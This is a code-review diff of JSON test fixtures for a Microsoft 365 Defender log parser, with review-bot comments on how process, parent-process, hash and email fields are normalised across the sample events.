System\",\"ProcessVersionInfoProductVersion\":\"10.0.22621.1\",\"ProcessVersionInfoInternalFileName\":\"processcommand.exe\",\"ProcessVersionInfoOriginalFileName\":\"processcommand.exe\",\"ProcessVersionInfoFileDescription\":\"Network Command Shell\",\"InitiatingProcessSessionId\":0,\"CreatedProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-11-08T14:38:51.9073727Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } }, "expected": { - "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", 
\"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":18026
4,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "message": 
"{\"time\":\"2024-11-08T14:39:36.1544409Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:39:21.6551859Z\",\"properties\":{\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessFileSize\":145408,\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"file.exe\",\"InitiatingProcessParentFileName\":\"file.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\file.exe\",\"InitiatingProcessCommandLine\":\"CommandExec.exe -Embedding ABCDEF0123456789 E Global\\\\HOST0000\",\"SHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"FileSize\":82944,\"MD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"FolderPath\":\"C:\\\\Windows\\\\processcommand.exe\",\"ProcessCommandLine\":\"\\\"processcommand.exe\\\" advfirewall firewall delete rule name=\\\"program=description= embedded HTTP server incoming traffic\\\"\",\"FileName\":\"processcommand.exe\",\"ProcessId\":4520,\"InitiatingProcessId\":10868,\"ProcessCreationTime\":\"2024-11-08T14:38:51.9030484Z\",\"DeviceName\":\"host.group.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:00.6744945Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessSignatureStatus\":\"Valid\",\"InitiatingProcessSignerType\":\"OsVendor\",\"InitiatingProcessParentId\":14840,\"ReportId\":17318,\"InitiatingProcessParentCreationTime\":\"2024-11-08T14:37:49.152209Z\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"InitiatingProcessIntegrityLevel\":\"System\",\"AccountDomain\":\"account 
domain\",\"AccountName\":\"syst\u00e8me\",\"ProcessTokenElevation\":\"TokenElevationTypeDefault\",\"ProcessIntegrityLevel\":\"System\",\"AccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"SHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"InitiatingProcessLogonId\":999,\"LogonId\":999,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"DesktopName\\\":\\\"Win\\\\\\\\Default\\\"}\",\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"file\",\"InitiatingProcessVersionInfoOriginalFileName\":\"file.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"ProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"ProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"ProcessVersionInfoProductVersion\":\"10.0.22621.1\",\"ProcessVersionInfoInternalFileName\":\"processcommand.exe\",\"ProcessVersionInfoOriginalFileName\":\"processcommand.exe\",\"ProcessVersionInfoFileDescription\":\"Network Command Shell\",\"InitiatingProcessSessionId\":0,\"CreatedProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-11-08T14:38:51.9073727Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", "event": { "category": [ "process" 
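Review bot: The null/empty-parent path through the parser loses its only test here, because the Linux sample (`InitiatingProcessSHA1`/`MD5`/`FolderPath` null, `InitiatingProcessFileName` empty, `InitiatingProcessParentId` 0, `InitiatingProcessId` equal to `ProcessId`, POSIX data in `AdditionalFields`) is replaced by a Windows firewall-rule-deletion event rather than kept alongside it. Keep the Linux case as its own fixture (e.g. `test_device_process_events_3.json`) with its expected output updated to the new `process.parent` layout, and add the new Windows event next to it. In the new sample the parent and child share the same `MD5`/`SHA1` (`51a9cac9…`, `44543e0c…`) but have different `SHA256` values, which weakens what the `related.hash` expectation can catch; distinct placeholder hashes per process would detect a swapped mapping. The file's second hunk is cut off at the end of this chunk, so its expected output is not reviewed here.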
@@ -13,70 +19,119 @@ "info" ] }, - "@timestamp": "2024-10-22T15:09:44.594155Z", + "@timestamp": "2024-11-08T14:38:51.907372Z", "action": { "properties": { - "InitiatingProcessLogonId": "0", - "LogonId": "0" + "AccountSid": "S-1-2-3", + "LogonId": "999", + "process": { + "IntegrityLevel": "System", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Network Command Shell", + "VersionInfoInternalFileName": "processcommand.exe", + "VersionInfoOriginalFileName": "processcommand.exe", + "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "VersionInfoProductVersion": "10.0.22621.1", + "parent": { + "CommandLine": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000", + "FileSize": 145408, + "IntegrityLevel": "System", + "LogonId": "999", + "TokenElevation": "TokenElevationTypeDefault", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Windows\u00ae installer", + "VersionInfoInternalFileName": "file", + "VersionInfoOriginalFileName": "file.exe", + "VersionInfoProductName": "Windows Installer - Unicode", + "VersionInfoProductVersion": "5.0.22621.3880" + } + } }, "type": "ProcessCreated" }, "file": { - "directory": "/usr/bin/ps", + "directory": "C:\\Windows\\processcommand.exe", "hash": { - "md5": "098f6bcd4621d373cade4e832627b4f6", - "sha1": "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3", - "sha256": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08" + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" }, - "name": "ps", - "size": 144632 + "name": "processcommand.exe", + "size": 82944 }, "host": { - "id": "86dd1cf45142e904cb2e99c2721fac3ca198c6ca", - "name": "computer.intranet.example" + "id": "123456789abcdef", + "name": "host.group.local" }, "microsoft": { "defender": { "report": { - 
"id": "67417" + "id": "17318" } } }, "process": { "args": [ - "--no-headers", - "-A", - "-o", - "comm,pid,pcpu,pmem,rss,etimes" + "HTTP", + "advfirewall", + "delete", + "embedded", + "firewall", + "incoming", + "name=\"program=description=", + "rule", + "server", + "traffic\"" ], - "code_signature": { - "status": "Unknown", - "subject_name": "Unknown" - }, - "command_line": "/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers", + "command_line": "\"processcommand.exe\" advfirewall firewall delete rule name=\"program=description= embedded HTTP server incoming traffic\"", + "name": "processcommand.exe", "parent": { - "pid": 0 + "args": [ + "-Embedding", + "ABCDEF0123456789", + "E", + "Global\\HOST0000" + ], + "code_signature": { + "status": "Valid", + "subject_name": "OsVendor" + }, + "command_line": "CommandExec.exe -Embedding ABCDEF0123456789 E Global\\HOST0000", + "executable": "c:\\windows\\file.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "file.exe", + "pid": 10868, + "start": "2024-11-08T14:38:00.674494Z", + "user": { + "domain": "account domain", + "id": "S-1-2-3", + "name": "syst\u00e8me" + }, + "working_directory": "c:\\windows" }, - "pid": 423627, - "start": "2024-10-22T15:09:44.594155Z", - "user": { - "domain": "computer", - "name": "root" - } + "pid": 4520, + "start": "2024-11-08T14:38:51.903048Z", + "working_directory": "C:\\Windows" }, "related": { "hash": [ - "098f6bcd4621d373cade4e832627b4f6", - "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08", - "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3" + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" ], "user": [ - "root" + "syst\u00e8me" ] }, "user": { - 
"domain": "computer", - "name": "root" + "domain": "account domain", + "name": "syst\u00e8me" } } } \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json b/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json index 3fe0d2cf8..212f23549 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_registry_events.json 
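Review bot: The new `process.args` expectation splits the single quoted argument `name="program=description= embedded HTTP server incoming traffic"` into alphabetically sorted words, so this fixture now pins a tokenization that loses both argument order and quoting; if argv-style arguments are intended the quoted token should stay whole, and if the sorted list is an artefact of a set the parser stage deserves a comment saying so. In the same hunk `file.directory` receives the full `FolderPath` value (`C:\\Windows\\processcommand.exe`) while `process.executable` is only populated for the parent from `InitiatingProcessFolderPath`, which leaves the created process without an executable path. The parser that produces these values is outside this patch, so this is pinned behaviour to confirm rather than a defect in the fixture text itself.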
@@ -16,17 +16,19 @@
 "@timestamp": "2023-01-04T14:35:20.616193Z",
 "action": {
 "properties": {
- "InitiatingProcessCommandLine": "\"omadmclient.exe\" /serverid \"1F2E9005-CEAB-4280-83A7-8429D26DE773\" /lookuptype 1 /initiator 0",
- "InitiatingProcessFileSize": 445440,
- "InitiatingProcessIntegrityLevel": "System",
- "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
- "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
- "InitiatingProcessVersionInfoFileDescription": "Host Process for OMA-DM Client",
- "InitiatingProcessVersionInfoInternalFileName": "omadmclient",
- "InitiatingProcessVersionInfoOriginalFileName": "omadmclient.exe",
- "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
- "InitiatingProcessVersionInfoProductVersion": "10.0.19041.2193",
- "PreviousRegistryKey": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements"
+ "PreviousRegistryKey": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements",
+ "process": {
+ "CommandLine": "\"omadmclient.exe\" /serverid \"1F2E9005-CEAB-4280-83A7-8429D26DE773\" /lookuptype 1 /initiator 0",
+ "FileSize": 445440,
+ "IntegrityLevel": "System",
+ "TokenElevation": "TokenElevationTypeDefault",
+ "VersionInfoCompanyName": "Microsoft Corporation",
+ "VersionInfoFileDescription": "Host Process for OMA-DM Client",
+ "VersionInfoInternalFileName": "omadmclient",
+ "VersionInfoOriginalFileName": "omadmclient.exe",
+ "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
+ "VersionInfoProductVersion": "10.0.19041.2193"
+ }
 },
 "type": "RegistryKeyDeleted"
 },
diff --git a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json
index a04e0e8be..72f93da4e 100644
--- a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json
+++ b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json
@@ -16,7 +16,11 @@
 "@timestamp": "2024-10-22T15:09:47.246794Z",
 "action": {
 "properties": {
- "InitiatingProcessLogonId": "0"
+ "process": {
+ "parent": {
+ "LogonId": "0"
+ }
+ }
 },
 "type": "ScriptContent"
 },
@@ -38,10 +42,9 @@
 },
 "process": {
 "parent": {
- "pid": 0
- },
- "pid": 423638,
- "start": "2024-10-22T15:09:47.165481Z"
+ "pid": 423638,
+ "start": "2024-10-22T15:09:47.165481Z"
+ }
 },
 "related": {
 "hash": [
diff --git a/Microsoft/microsoft-365-defender/tests/test_email_events.json b/Microsoft/microsoft-365-defender/tests/test_email_events.json
index 294c92d60..5f3e9f9b1 100644
--- a/Microsoft/microsoft-365-defender/tests/test_email_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_email_events.json
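Review bot: The second hunk of test_devices_events_script_content.json moves `pid`/`start` under `process.parent` and leaves `process` with nothing but a parent, whereas the registry-events fixture immediately before it maps the same `InitiatingProcess*` properties to `action.properties.process` rather than to a parent; two fixtures in this patch therefore encode opposite conventions for where the initiating process of a single-process event lands. Whichever is intended, the rule (initiating process is the actor for DeviceEvents/DeviceRegistryEvents, the parent only when a created process exists) belongs as a comment in the parser stage, which is outside this hunk. A normalised event that carries `process.parent.pid` but no `process.pid` will also read as a data gap to anyone consuming it downstream.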
@@ -17,16 +17,18 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessLogonId": "121834210", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "FileSize": 14687048, + "LogonId": "121834210", + "VersionInfoCompanyName": "Google", + "VersionInfoFileDescription": "Software Reporter Tool", + "VersionInfoInternalFileName": "software_reporter_tool_exe", + "VersionInfoOriginalFileName": "software_reporter_tool.exe", + "VersionInfoProductName": "Software Reporter Tool", + "VersionInfoProductVersion": "102.286.200" + } }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json b/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json index f2ac938fb..122a2bc61 100644 --- a/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json 
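Review bot: This fixture and the six identical ones later in the patch (test_email_url_info, test_identity_directory, test_identity_info, test_identity_logon, test_identity_query, test_local_ip) all carry the same NtAllocateVirtualMemoryApiCall device payload, so none of them exercises the email or identity table its file name promises, and the relocation of `InitiatingProcess*` under `action.properties.process` is asserted seven times for one input. The moved fields land under `process` here but under `process.parent` in the ScriptContent and ProcessCreated fixtures; if that split is deliberate it is worth a one-line note in the parser, and if not the seven copies could be collapsed to one fixture while the others receive payloads for their actual categories.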
+++ b/Microsoft/microsoft-365-defender/tests/test_email_post_delivery.json 
@@ -3,7 +3,7 @@ "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<1@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}" }, "expected": { - "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<01020192520c9bb4-8a4c9d72-a832-47b9-a13f-ce92d3da71ba-000000@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}", + "message": "{\"time\": \"2024-10-03T11:12:21.6209320Z\", \"tenantId\": \"ca4e9ba9-4582-4f4b-a93e-c6ce41b32aac\", \"operationName\": \"Publish\", 
\"category\": \"AdvancedHunting-EmailPostDeliveryEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:11:32.8258142Z\", \"properties\": {\"ReportId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7-10422652723071570813\", \"NetworkMessageId\": \"ec1ad6fe-05ae-4125-bf06-498bc60113f7\", \"RecipientEmailAddress\": \"john.doe@example.com\", \"Timestamp\": \"2024-10-03T11:11:32Z\", \"ActionType\": \"Spam ZAP\", \"ActionResult\": \"Success\", \"Action\": \"Moved to quarantine\", \"DeliveryLocation\": \"Quarantine\", \"ActionTrigger\": \"SpecialAction\", \"InternetMessageId\": \"<1@eu-west-1.amazonses.com>\", \"ThreatTypes\": \"Spam\", \"DetectionMethods\": \"{\\\"Spam\\\":[\\\"Fingerprint matching\\\"]}\"}, \"Tenant\": \"DefaultTenant\"}", "event": { "action": "Moved to quarantine", "category": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_email_url_info.json b/Microsoft/microsoft-365-defender/tests/test_email_url_info.json index 031a0b50a..57b4e7abc 100644 --- a/Microsoft/microsoft-365-defender/tests/test_email_url_info.json +++ b/Microsoft/microsoft-365-defender/tests/test_email_url_info.json 
@@ -16,16 +16,18 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessLogonId": "121834210", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "FileSize": 14687048, + "LogonId": "121834210", + "VersionInfoCompanyName": "Google", + "VersionInfoFileDescription": "Software Reporter Tool", + "VersionInfoInternalFileName": "software_reporter_tool_exe", + "VersionInfoOriginalFileName": "software_reporter_tool.exe", + "VersionInfoProductName": "Software Reporter Tool", + "VersionInfoProductVersion": "102.286.200" + } }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_directory.json b/Microsoft/microsoft-365-defender/tests/test_identity_directory.json index 7d110bb54..e45140956 100644 --- a/Microsoft/microsoft-365-defender/tests/test_identity_directory.json 
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_directory.json @@ -16,16 +16,18 @@ "@timestamp": "2022-09-01T07:09:47.498056Z", "action": { "properties": { - "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", - "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", - "InitiatingProcessFileSize": 14687048, - "InitiatingProcessLogonId": "121834210", - "InitiatingProcessVersionInfoCompanyName": "Google", - "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool", - "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe", - "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe", - "InitiatingProcessVersionInfoProductName": "Software Reporter Tool", - "InitiatingProcessVersionInfoProductVersion": "102.286.200" + "process": { + "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2", + "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2", + "FileSize": 14687048, + "LogonId": "121834210", + "VersionInfoCompanyName": "Google", + "VersionInfoFileDescription": "Software Reporter Tool", + "VersionInfoInternalFileName": "software_reporter_tool_exe", + "VersionInfoOriginalFileName": "software_reporter_tool.exe", + "VersionInfoProductName": "Software Reporter Tool", + "VersionInfoProductVersion": "102.286.200" + } }, "type": "NtAllocateVirtualMemoryApiCall" }, diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_info.json 